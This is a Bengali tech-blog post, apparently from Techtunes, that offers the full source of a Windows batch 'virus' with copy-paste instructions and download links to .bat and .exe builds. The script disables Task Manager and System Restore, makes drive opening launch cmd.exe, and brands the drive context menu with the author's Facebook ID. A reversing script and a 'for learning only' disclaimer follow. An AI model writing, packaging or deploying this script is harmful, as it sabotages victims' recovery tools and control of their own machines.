দেখে নিন একটি সহজ কম্পিউটার ভাইরাস ও তার কার্যপ্রণালী ।

এর আগের টিউনটির থেকে (https://www.techtunes.io/tips-and-tricks/tune-id/195374) বুঝলাম যে অনেকেরই এখনও OS সম্পর্কে জ্ঞান আরও ঝালাইয়ের প্রয়োজন আছে। তাই এবার ভাবলাম, এই টিউনে উত্তর ছাড়া কোন ধাঁধাঁ নিয়ে টিউন করব না।

অনেকেই অজান্তে  কম্পিউটার ভাইরাসের খপ্পরে পড়ে এবং তাঁর ফলে কম্পিউটার ব্যবহারকারী নানাবিধ সমস্যার সম্মুখিন হন। আপনার নির্দেশ অনুসারে আপনার কম্পিউটার তখন কাজ করে না। যেমন ড্রাইভ গুলো ঠিক ভাবে কাজ করে না, TASK MANAGER কাজ করে না, ভুলভাল অপশন দেখায়, এমনকি ভাইরাসকে সিস্টেম থেকে মোছার জন্য যদি System Restore ব্যবহার করতে চান তাহলে সেটিও কাজ করে না ....... তাইতো?? আজকে আমি সেই রকম একটি ভাইরাস বানিয়ে আপনাদের কে তার source code সহ দিয়ে দিচ্ছি।  আপনিও জানতে পারবেন যে ভাইরাস কিভাবে প্রোগ্রাম করা হয় এবং ভাইরাস সিস্টেম এ কোথায় কোথায় ক্ষতি করে। কারন আপনি যদি জানেন যে চোর কোন পথে চুরি করতে আসবে, তাহলে নিশ্চয় আপনি চোরের বুদ্ধির চেয়ে এগিয়ে থাকবেন।

নিচের এই Message Box টি অনেকেই হয়ত Task Manager ওপেন করতে গিয়ে দেখছে। এটি একটি খুবই কমন Tricks ভাইরাস প্রোগ্রামারদের কাছে।

আমি ভাইরাসটি সবার বোঝার সুবিধার জন্য BATCH এ প্রোগ্রাম করেছি, কারন সবারই কম-বেশী  MS DOS এর সম্পর্কে জ্ঞান আছে।

আমার ভাইরাস টির source code

নিচের লেখাগুলো (@echo off থেকে exit পর্যন্ত) কপি করে notepad খুলে paste করুন। তারপর ফাইলটিকে abc.bat নাম দিয়ে সেভ করুন (abc এর জায়গায় অন্য নামও দিতে পারেন) । আর সেভ করার সময় "save as type" থেকে "All Files" সিলেক্ট করবেন।

@echo off
Rem Eta ekta virus er moto kintu Tottaly virus noy,
Rem karon kono rokom %SYSTEM% ROOT te infection korar command dilam na
Rem jodi karo infection (mane ek PC theke arek PC te infection Code chan tahole janan)
Rem amar FB http://www.facebook.com/vivek.roy.14855
echo REGEDIT4> %TEMP%.\T1.DAT
echo [HKEY_LOCAL_MACHINE\SOFTWARE\Classes\Drive\shell\open]>> %TEMP%.\T1.DAT
echo "Value"=->> %TEMP%.\T1.DAT
REGEDIT /S %TEMP%.\T1.DAT
del %TEMP%.\T1.DAT

REG ADD HKEY_LOCAL_MACHINE\SOFTWARE\Classes\Drive\shell\open\command /ve /t REG_SZ /d C:\WINDOWS\system32\cmd.exe /f
REG ADD HKEY_LOCAL_MACHINE\SOFTWARE\Classes\Drive\shell /ve /t REG_SZ /d open /f
REG add HKCU\Software\Microsoft\Windows\CurrentVersion\Policies\System /ve /t REG_SZ /d open /f

echo REGEDIT4> %TEMP%.\T1.DAT
echo [HKEY_LOCAL_MACHINE\SOFTWARE\Classes\Drive\shell\www.facebook.com/vivek.roy.14855]>> %TEMP%.\T1.DAT
echo "Value"=->> %TEMP%.\T1.DAT
REGEDIT /S %TEMP%.\T1.DAT
del %TEMP%.\T1.DAT

REM TASK MANAGER DISABLE KORAR COMMAND
REG ADD HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\System /v DisableTaskMgr /t REG_DWORD /d 00000001 /f

Rem System restore kaaj korbe na
rem Windows 7 key
REG ADD "HKEY_LOCAL_MACHINE\SOFTWARE\Policies\Microsoft\Windows NT\SystemRestore" /v DisableConfig /t REG_DWORD /d 00000001 /f
REG ADD "HKEY_LOCAL_MACHINE\SOFTWARE\Policies\Microsoft\Windows NT\SystemRestore" /v DisableSR /t REG_DWORD /d 00000001 /f
REG ADD [HKEY_LOCAL_MACHINE\SOFTWARE\Policies\Microsoft\Windows NT\SystemRestore] /v DisableConfig /t REG_DWORD /d 00000001 /f
REG ADD [HKEY_LOCAL_MACHINE\SOFTWARE\Policies\Microsoft\Windows NT\SystemRestore] /v DisableSR /t REG_DWORD /d 00000001 /f

rem xp key
REG ADD HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\sr /v Start /t REG_DWORD /d 00000004 /f

REG ADD [HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\SystemRestore] /v DisableSR /t REG_DWORD /d 00000001 /f
REG ADD "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\SystemRestore" /v DisableSR /t REG_DWORD /d 00000001 /f

Reg add "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\SystemRestore" /v DisableSR /t REG_DWORD /d "00000001" /f>Nul
exit

===============================================================================================

বুঝতে অসুবিধে হলে batch file টি  এই লিঙ্ক http://www.mediafire.com/?c6ypzwu79c2reoz   থেকে ডাউনলোড করে নিতে পারবেন।

batch file টি exe ফরম্যাটে এখান থেকে ডাউনলোড  করে নিতে পারবেন। http://www.mediafire.com/?7mclg5ujzk9sknd

===============================================================================================

উপরোক্ত ভাইরাস টি কম্পিউটার এ -

১.  Task Manager ব্লক করে দিবে।

২. ড্রাইভ ওপেন হবে না। open করতে গেলে MS DOS খুলে যাবে।

৩. ড্রাইভ এর গায়ে right click করলে আমার ফেসবুক আই।ডি দেখাবে।

৪. সিস্টেম রিষ্টর চালু করতে দিবে না।

তবে উপরক্ত ভাইরাস টি আপনার সিস্টেম ফাইল কে কোন ক্ষতি করবে না এবং অপারেটিং সিস্টেম কে অক্ষত রাখবে,  আর এই ভাইরাস টিকে নিজে থেকে অন্য কম্পিউটার বা রিমুভাল এ ছড়িয়ে পড়ার জন্য তৈরি করিনি। তাই ভয়ের কোন কারন নেই।

===============================================================================================

ওসুধ

নিচের ফাইলটি রান করলে আপনার কম্পিউটার আবার আগের মত হয়ে যাবে।

নিচের সোর্স কোড টি notepad এ কপি-পেস্ট করে যেকোনো নাম দিয়ে .BAT  ফাইল এ সেভ করুন। আর সেভ করার সময় "save as type" থেকে "All Files" সিলেক্ট করবেন। তারপর run করুন।

Rem Eta ekta amar virus er khotipuron korbe
Rem amar FB http://www.facebook.com/vivek.roy.14855

REG DELETE HKEY_LOCAL_MACHINE\SOFTWARE\Classes\Drive\shell\open /F
REG DELETE HKEY_LOCAL_MACHINE\SOFTWARE\Classes\Drive\shell /v open /f
REG DELETE HKCU\Software\Microsoft\Windows\CurrentVersion\Policies\System /v open /f

REG DELETE HKEY_LOCAL_MACHINE\SOFTWARE\Classes\Drive\shell\www.facebook.com/vivek.roy.14855 /f

REM TASK MANAGER UNLOCK KORAR COMMAND
REG ADD HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\System /v DisableTaskMgr /t REG_DWORD /d 00000000 /f

Rem System restore kaaj korbe
rem Windows 7 key
REG ADD [HKEY_LOCAL_MACHINE\SOFTWARE\Policies\Microsoft\Windows NT\SystemRestore] /v DisableConfig /t REG_DWORD /d 00000000 /f
REG ADD [HKEY_LOCAL_MACHINE\SOFTWARE\Policies\Microsoft\Windows NT\SystemRestore] /v DisableSR /t REG_DWORD /d 00000000 /f
REG ADD "HKEY_LOCAL_MACHINE\SOFTWARE\Policies\Microsoft\Windows NT\SystemRestore" /v DisableConfig /t REG_DWORD /d 00000000 /f
REG ADD "HKEY_LOCAL_MACHINE\SOFTWARE\Policies\Microsoft\Windows NT\SystemRestore" /v DisableSR /t REG_DWORD /d 00000000 /f

rem xp key
REG ADD HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\sr /v Start /t REG_DWORD /d 00000000 /f

REG ADD [HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\SystemRestore] /v DisableSR /t REG_DWORD /d 00000000 /f
REG ADD "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\SystemRestore" /v DisableSR /t REG_DWORD /d 00000000 /f

Reg add "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\SystemRestore" /v DisableSR /t REG_DWORD /d "00000000" /f>Nul
exit

=================================================================================================

বুঝতে অসুবিধে হলে batch file টি  এই লিঙ্ক  http://www.mediafire.com/?pydr72jhimd6jkw   থেকে ডাউনলোড করে নিতে পারবেন।

batch file টি exe ফরম্যাটে এখান থেকে ডাউনলোড  করে নিতে পারবেন। http://www.mediafire.com/?ymbdpzxvt0cjykk

আর batch থেকে exe তে compile করতে চাইলে , download করে নিন http://www.mediafire.com/download.php?la7i74877qps825
=================================================================================================
****   মনে রাখবেন কারও ক্ষতি করা প্রোগ্রামিং শেখার উদ্দেশ্য নয়, তাই শুধুমাত্র শেখার জন্য এই source code গুলি ব্যবহার করবেন। কারো ক্ষতি করবেন না।    ******* ( আর sunny leone সম্পর্কে NO COMMENTS )

Level 0

আমি n2roy। বিশ্বের সর্ববৃহৎ বিজ্ঞান ও প্রযুক্তির সৌশল নেটওয়ার্ক - টেকটিউনস এ আমি 12 বছর যাবৎ যুক্ত আছি। টেকটিউনস আমি এ পর্যন্ত 7 টি টিউন ও 130 টি টিউমেন্ট করেছি। টেকটিউনসে আমার 0 ফলোয়ার আছে এবং আমি টেকটিউনসে 0 টিউনারকে ফলো করি।


টিউনস


আরও টিউনস


টিউনারের আরও টিউনস


টিউমেন্টস

প্রত্যেকটা লাইনের কি কাজ বুঝিয়ে বললে ভাল হত।

Level 0

@রহিম উদ্দিন বাবু: ok ami sokale sob command gulor mane bujhiye dibo. Good night.